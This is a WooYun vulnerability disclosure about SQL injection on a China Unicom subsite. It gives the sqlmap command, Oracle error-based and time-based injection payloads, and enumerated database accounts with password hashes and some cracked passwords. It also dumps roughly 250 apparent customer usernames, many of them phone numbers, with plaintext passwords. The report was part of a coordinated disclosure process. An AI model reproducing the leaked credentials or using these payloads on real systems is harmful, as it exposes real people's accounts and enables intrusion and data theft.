当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157296

漏洞标题:运营商安全之联通某业务分站注入

相关厂商:中国联通

漏洞作者: 李旭敏

提交时间:2015-12-01 13:38

修复时间:2016-01-18 13:50

公开时间:2016-01-18 13:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-01: 细节已通知厂商并且等待厂商处理中
2015-12-04: 厂商已经确认,细节仅向厂商公开
2015-12-14: 细节向核心白帽子及相关领域专家公开
2015-12-24: 细节向普通白帽子公开
2016-01-03: 细节向实习白帽子公开
2016-01-18: 细节向公众公开

简要描述:

详细说明:

1.png


./sqlmap.py -u "http://**.**.**.**:80/tmap/map_unicom_list.asp?province=31&type=1&name=1&companytype=11&page=1" -p name


---
Parameter: name (GET)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: province=31&type=1&name=1' AND 8515=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(112)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (8515=8515) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(122)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL) AND 'WRhY' LIKE 'WRhY&companytype=11&page=1
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: province=31&type=1&name=1' AND 7020=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'UZfg' LIKE 'UZfg&companytype=11&page=1
---
[12:01:22] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle
available databases [7]:
[*] CTXSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] SYS
[*] SYSTEM
[*] TSH_CMS

[*] _NEXT_USER [1]:
    password hash: NULL
[*] ANONYMOUS [1]:
    password hash: anonymous
[*] AQ_ADMINISTRATOR_ROLE [1]:
    password hash: NULL
[*] AQ_USER_ROLE [1]:
    password hash: NULL
[*] AUTHENTICATEDUSER [1]:
    password hash: NULL
[*] CONNECT [1]:
    password hash: NULL
[*] CTXAPP [1]:
    password hash: NULL
[*] CTXSYS [1]:
    password hash: 71E687F036AD56E5
[*] CWM_USER [1]:
    password hash: NULL
[*] DBA [1]:
    password hash: NULL
[*] DBSNMP [1]:
    password hash: 8A7084606AE5EB5C
[*] DELETE_CATALOG_ROLE [1]:
    password hash: NULL
[*] DIP [1]:
    password hash: CE4A36B8E06CA59C
    clear-text password: DIP
[*] DMSYS [1]:
    password hash: BFBA5A553FD9E28A
[*] EJBCLIENT [1]:
    password hash: NULL
[*] EXECUTE_CATALOG_ROLE [1]:
    password hash: NULL
[*] EXFSYS [1]:
    password hash: 66F4EF5650C20355
[*] EXP_FULL_DATABASE [1]:
    password hash: NULL
[*] GATHER_SYSTEM_STATISTICS [1]:
    password hash: NULL
[*] GLOBAL_AQ_USER_ROLE [1]:
    password hash: GLOBAL
[*] HS_ADMIN_ROLE [1]:
    password hash: NULL
[*] IMP_FULL_DATABASE [1]:
    password hash: NULL
[*] JAVA_ADMIN [1]:
    password hash: NULL
[*] JAVA_DEPLOY [1]:
    password hash: NULL
[*] JAVADEBUGPRIV [1]:
    password hash: NULL
[*] JAVAIDPRIV [1]:
    password hash: NULL
[*] JAVASYSPRIV [1]:
    password hash: NULL
[*] JAVAUSERPRIV [1]:
    password hash: NULL
[*] LOGSTDBY_ADMINISTRATOR [1]:
    password hash: NULL
[*] MDDATA [1]:
    password hash: DF02A496267DEE66
    clear-text password: MDDATA
[*] MDSYS [1]:
    password hash: 72979A94BAD2AF80
[*] MGMT_USER [1]:
    password hash: NULL
[*] MGMT_VIEW [1]:
    password hash: 935F95FB02BB4765
[*] OEM_ADVISOR [1]:
    password hash: NULL
[*] OEM_MONITOR [1]:
    password hash: NULL
[*] OLAP_DBA [1]:
    password hash: NULL
[*] OLAP_USER [1]:
    password hash: NULL
[*] OLAPI_TRACE_USER [1]:
    password hash: NULL
[*] OLAPSYS [1]:
    password hash: 4AC23CC3B15E2208
[*] ORACLE_OCM [1]:
    password hash: 5A2E026A9157958C
[*] ORDPLUGINS [1]:
    password hash: 88A2B2C183431F00
[*] ORDSYS [1]:
    password hash: 7EFA02EC7EA6B86F
    clear-text password: ORDSYS
[*] OUTLN [1]:
    password hash: 4A3BA55E08595C81
[*] PUBLIC [1]:
    password hash: NULL
[*] RECOVERY_CATALOG_OWNER [1]:
    password hash: NULL
[*] RESOURCE [1]:
    password hash: NULL
[*] SCHEDULER_ADMIN [1]:
    password hash: NULL
[*] SELECT_CATALOG_ROLE [1]:
    password hash: NULL
[*] SI_INFORMTN_SCHEMA [1]:
    password hash: 84B8CBCA4D477FA3
    clear-text password: SI_INFORMTN_SCHEMA
[*] SJSC [1]:
    password hash: F78A2CA3C9FC1704
    clear-text password: SJSC
[*] SYS [1]:
    password hash: 75800913E1B66343
[*] SYSMAN [1]:
    password hash: 28F72A3C2D75FDE9
[*] SYSTEM [1]:
    password hash: 970BAA5B81930A40
[*] TSH_CMS [1]:
    password hash: AB00BC770037B5D7
[*] TSMSYS [1]:
    password hash: 3DF26A8B17D0F29F
[*] UNISK_TEST [1]:
    password hash: 273DB3E97685FF90
[*] UNITEST [1]:
    password hash: A2E8021EA6E17874
    clear-text password: UNITEST
[*] UNIWO [1]:
    password hash: FF370F03D3985606
    clear-text password: UNIWO
[*] WM_ADMIN_ROLE [1]:
    password hash: NULL
[*] WMSYS [1]:
    password hash: 7C9BA362F8314299
[*] XDB [1]:
    password hash: 88D8364765FCE6AF
[*] XDBADMIN [1]:
    password hash: NULL
[*] XDBWEBSERVICES [1]:
    password hash: NULL


漏洞证明:

+------------------+--------------------------------------------+------+
| USERNAME         | PASSWORD                                   | MAIL |
+------------------+--------------------------------------------+------+
[14:39:17] [WARNING] console output will be trimmed to last 256 rows due to large table size
| 15611112502      | dididi                                     | NULL |
| suhua            | 751226                                     | NULL |
| Zlakiroran       | 19861224                                   | NULL |
| yangyonghong     | 20010804                                   | NULL |
| mengqk           | 600212                                     | NULL |
| tz6lbj           | 666666                                     | NULL |
| jiali906         | 850906                                     | NULL |
| bintang          | dubint                                     | NULL |
| 13104683304      | 123456                                     | NULL |
| suifengerqu      | 541888                                     | NULL |
| 13011530114      | 13011530114                                | NULL |
| 15612036025      | 15612036025                                | NULL |
| 13003610508      | 13003610508                                | NULL |
| 18642900631      | 7034030                                    | NULL |
| 1864111          | 870306                                     | NULL |
| shanhewose       | a19890701                                  | NULL |
| 18641112809      | 123456                                     | NULL |
| lcliuliu         | 123456                                     | NULL |
| mmibb            | mm                                         | NULL |
| santongfan       | fantaoWUUNI                                | NULL |
| zhaozd           | 123456                                     | NULL |
| lcyy             | lhbhi20060318                              | NULL |
| loveyou          | lcylovesq1314                              | NULL |
| ccc111cc         | ccc111                                     | NULL |
| wangxx           | 135790                                     | NULL |
| GLCHENG          | mtwfhqpy                                   | NULL |
| hongqi93         | 100789                                     | NULL |
| lanmao           | 20890701                                   | NULL |
| zhoukaixuan      | 111222                                     | NULL |
| mallpall         | 421514                                     | NULL |
| liusg36          | 922384                                     | NULL |
| ZHANJUN          | 101715                                     | NULL |
| 18641119588      | 18641119588                                | NULL |
| ewsd1240         | yxb0305                                    | NULL |
| ffy123           | DLffy123                                   | NULL |
| hebiao           | 840921                                     | NULL |
| 15637101282      | 123456                                     | NULL |
| ibincn           | zhangbin930812                             | NULL |
| lmj16578658      | 916718                                     | NULL |
| 15637006129      | 006129                                     | NULL |
| 15554163558      | 710310                                     | NULL |
| renny            | 535106                                     | NULL |
| 15513075167      | 15513075167                                | NULL |
| yingzi           | cwz741109                                  | NULL |
| hnsmxxr          | abc123                                     | NULL |
| 116117           | 116117                                     | NULL |
| stillme          | wang10121986                               | NULL |
| 992478972        | 516536                                     | NULL |
| liantng131       | 13134175685                                | NULL |
| 18641115750      | 123456                                     | NULL |
| cpcuibm          | 191028                                     | NULL |
| sovi             | 147258                                     | NULL |
| Gaoxzcf          | 13519025155                                | NULL |
| 15609715655      | 111111                                     | NULL |
| yushijin         | 123456                                     | NULL |
| fax6688          | 800120                                     | NULL |
| ghostli100       | 19890118                                   | NULL |
| leizi            | 154813519                                  | NULL |
| gotoyes          | 200300                                     | NULL |
| 1057             | 20102010                                   | NULL |
| dhl0118          | 782163                                     | NULL |
| gvei             | gvei169                                    | NULL |
| baoxiuyun        | 730211                                     | NULL |
| xjmacky          | 760526                                     | NULL |
| 13193148804      | 111111                                     | NULL |
| ymeng            | 123456                                     | NULL |
| 13014512670      | 839502                                     | NULL |
| aaaa             | 761216                                     | NULL |
| 15516945883      | 15516945883                                | NULL |
| 326034825        | 1108865595                                 | NULL |
| yangyong         | 412726                                     | NULL |
| jixinhua         | 198610                                     | NULL |
| 13259792689      | 000000                                     | NULL |
| 13277226161      | 111222                                     | NULL |
| 1598             | 131132                                     | NULL |
| wo186            | 131132                                     | NULL |
| shanshui         | 988989                                     | NULL |
| chenlong1982     | 562743                                     | NULL |
| suixiaogang      | 198726                                     | NULL |
| seamanlay        | 5667561                                    | NULL |
| 9060             | 983986                                     | NULL |
| 1395             | 168600                                     | NULL |
| qingyuan         | 925123                                     | NULL |
| tonydhj          | dhj5211314                                 | NULL |
| yangguangjiyi    | 410325325410                               | NULL |
| chenlifeng       | chen13076799410                            | NULL |
| chinacows        | woaini19850622                             | NULL |
| 809298077        | cpj49928                                   | NULL |
| Lauken           | 330410                                     | NULL |
| zhiqiu           | 100100981031                               | NULL |
| ABCD1107631825   | 031125                                     | NULL |
| lujiaolong       | 04050905                                   | NULL |
| ahat             | 720507                                     | NULL |
| xiangxiang       | 909955                                     | NULL |
| cheng            | chengyining2007                            | NULL |
| yfsok            | 62665822                                   | NULL |
| 446209495        | xing13266416556                            | NULL |
| haode            | 0306                                       | NULL |
| a46182898        | a19870205                                  | NULL |
| wxhwrygj         | 14971590                                   | NULL |
| 8622             | 850178                                     | NULL |
| wuqian520        | shizhongruyiqian                           | NULL |
| Lijh             | li56780                                    | NULL |
| 574006683        | 3021087                                    | NULL |
| trx00000         | 780720                                     | NULL |
| yjpyjp           | 733209                                     | NULL |
| q703986096       | 101901                                     | NULL |
| weixl            | 114263                                     | NULL |
| 13297666826      | 768203                                     | NULL |
| 13204385056      | 13204385056                                | NULL |
| 798388561        | 13409201794                                | NULL |
| 13280801626      | 1626                                       | NULL |
| sntewg           | 870713                                     | NULL |
| 282413           | 101707                                     | NULL |
| gbz18            | 189376                                     | NULL |
| liuyanginchina   | 371522                                     | NULL |
| 18656611719      | 737499                                     | NULL |
| lijiang1006      | ok13963099724                              | NULL |
| 7919             | 131132                                     | NULL |
| ylqs001          | iedibrd5                                   | NULL |
| 7933             | 198312                                     | NULL |
| 868498           | 131132                                     | NULL |
| 0395             | 131132                                     | NULL |
| qwertyuiop       | 147258                                     | NULL |
| wangtao          | 853260                                     | NULL |
| yanghong         | 123456789                                  | NULL |
| yanpen           | 198403                                     | NULL |
| zhangkai         | zhangkai                                   | NULL |
| pelva            | 820625                                     | NULL |
| 15636050408      | 691910                                     | NULL |
| shibo            | 60236435231                                | NULL |
| QINHUIXIN        | 123456                                     | NULL |
| huangwei         | 123456789                                  | NULL |
| 15585535380      | 680326680326                               | NULL |
| long             | ojl                                        | NULL |
| mechelle         | 11701170                                   | NULL |
| ym3188           | 112019                                     | NULL |
| 15948009185      | 123456                                     | NULL |
| jlbclwt          | 58541240                                   | NULL |
| et1987           | et1987                                     | NULL |
| aqatg20110906    | 392691                                     | NULL |
| smxlhl           | 2863079                                    | NULL |
| 13212003558      | 19840302                                   | NULL |
| mininaso         | miyuxin                                    | NULL |
| sy123321         | 135246                                     | NULL |
| 18641116753      | 18641116753                                | NULL |
| dlxhrj           | 495602                                     | NULL |
| zhaicj1          | 123321                                     | NULL |
| 18604921297      | 861120                                     | NULL |
| fenxiang         | 19770428                                   | NULL |
| wangsuiyi        | 412413                                     | NULL |
| gxl2011          | 654321                                     | NULL |
| huyiling         | 915915                                     | NULL |
| zakuan           | aa123456                                   | NULL |
| bhrc             | 123456a                                    | NULL |
| yf661            | 131132                                     | NULL |
| sjz881           | 131132                                     | NULL |
| zhanglishang     | rshqch2009                                 | NULL |
| zgf869           | dlpass9869                                 | NULL |
| unisk001         | 20001123                                   | NULL |
| zhangliping      | 198610                                     | NULL |
| xinyue           | 198610                                     | NULL |
| sk9998           | 117988                                     | NULL |
| lxxycl           | yang9257954                                | NULL |
| haidao           | 710224                                     | NULL |
| 13277226262      | 111222                                     | NULL |
| yangyang         | 549175                                     | NULL |
| ltwz             | 9365131                                    | NULL |
| xadf001          | 12837123                                   | NULL |
| 4921998          | lei20031022                                | NULL |
| csic_lw          | 15319907931                                | NULL |
| wangxu           | 1234                                       | NULL |
| qingxian         | 653368                                     | NULL |
| jaycntw1         | 1990531                                    | NULL |
| 907396           | 201310                                     | NULL |
| bynd419          | 002315                                     | NULL |
| wsb76778945      | 951357                                     | NULL |
| 13256308679      | 222222                                     | NULL |
| hero191000       | 8272882728                                 | NULL |
| shaniuniu        | 494662493                                  | NULL |
| hl8865067        | 830801                                     | NULL |
| 821829540        | 880815                                     | NULL |
| wu0019           | 830111                                     | NULL |
| 13098444446      | 111222                                     | NULL |
| ZHAOQIANG        | 19910110                                   | NULL |
| 1589             | 131132                                     | NULL |
| fayen            | 123456                                     | NULL |
| laoma            | 6602618                                    | NULL |
| mingzhu          | 662256                                     | NULL |
| 18602896237      | 252831                                     | NULL |
| 15607360638      | 822600                                     | NULL |
| 15607360639      | 000111                                     | NULL |
| teldzh           | taoenli                                    | NULL |
| chinaunicom      | 123456                                     | NULL |
| shenxiaoqiao     | 800526                                     | NULL |
| yangangyuan      | 230201                                     | NULL |
| 68834634         | 010010001a                                 | NULL |
| 454084893        | 511123                                     | NULL |
| hp815            | 188486                                     | NULL |
| love_880809      | 809809                                     | NULL |
| wsniuxiaoniu     | 12908819niu                                | NULL |
| 547914367        | 917190                                     | NULL |
| sun0000          | 830618                                     | NULL |
| jinyanfighting   | jinyan0710                                 | NULL |
| kalen            | 13756045542                                | NULL |
| 13253469087      | 555555                                     | NULL |
| zzybv            | 756430                                     | NULL |
| dongxiahaohao    | zhangdongxia                               | NULL |
| 15637809263      | 881213                                     | NULL |
| mxy3000          | 4172705                                    | NULL |
| 735667822        | 13071031803                                | NULL |
| leiboby          | 123465                                     | NULL |
| 15639609281      | 790417                                     | NULL |
| gongzheng        | gongzheng                                  | NULL |
| kfhglt           | li8282033                                  | NULL |
| zhouhui888       | 811111                                     | NULL |
| fxgfan           | 0210746                                    | NULL |
| hnsc888          | 761217                                     | NULL |
| weilai           | abc                                        | NULL |
| longbao1126      | 19921126                                   | NULL |
| yueastor         | 274256601                                  | NULL |
| 453867817        | a64758053                                  | NULL |
| yangjunlei       | yangjunlei                                 | NULL |
| wanglibin        | 721545                                     | NULL |
| wwweizhen        | 15837975923                                | NULL |
| leungloh         | WiFi3GChina                                | NULL |
| 376386271        | 19890910                                   | NULL |
| dxtjy            | 123456                                     | NULL |
| 3655             | 13014593655                                | NULL |
| hbqinbo          | hnqinbo                                    | NULL |
| ycy1022          | 404470019                                  | NULL |
| 131371723231     | 052217                                     | NULL |
| yangand2008      | 197259                                     | NULL |
| zhuchangyong     | 13290965985                                | NULL |
| ilsunbo          | sunbohao                                   | NULL |
| yinkunji8888     | 2525131425                                 | NULL |
| a76740087        | 76740087                                   | NULL |
| 15637102026      | hy5668518                                  | NULL |
| 880815           | 821829540                                  | NULL |
| 15585302777      | 521512                                     | NULL |
| 666666           | 200300                                     | NULL |
| shenxiaomei      | 657306                                     | NULL |
| wxyh             | lhbhi20060318                              | NULL |
| 13220226687      | gao7322845                                 | NULL |
| 13242440255      | 0807                                       | NULL |
| zhujing6         | 001368                                     | NULL |
| kouhz1           | 111111                                     | NULL |
| Houzj8           | hzj670624                                  | NULL |
| lczx             | 000635                                     | NULL |
| Andy             | 888999                                     | NULL |
| 2653             | 131132                                     | NULL |
| 18651278512      | 612523                                     | NULL |
| asdf             | 376891217                                  | NULL |
| 83377948         | 19850612                                   | NULL |
| 13146300852      | 820222                                     | NULL |
| 13146601103      | 6601103                                    | NULL |
+------------------+--------------------------------------------+------+

修复方案:

版权声明:转载请注明来源 李旭敏@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-12-04 13:44

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国联通集团公司通报,由其后续协调网站管理部门处置。

最新状态:

暂无

漏洞评价:

评价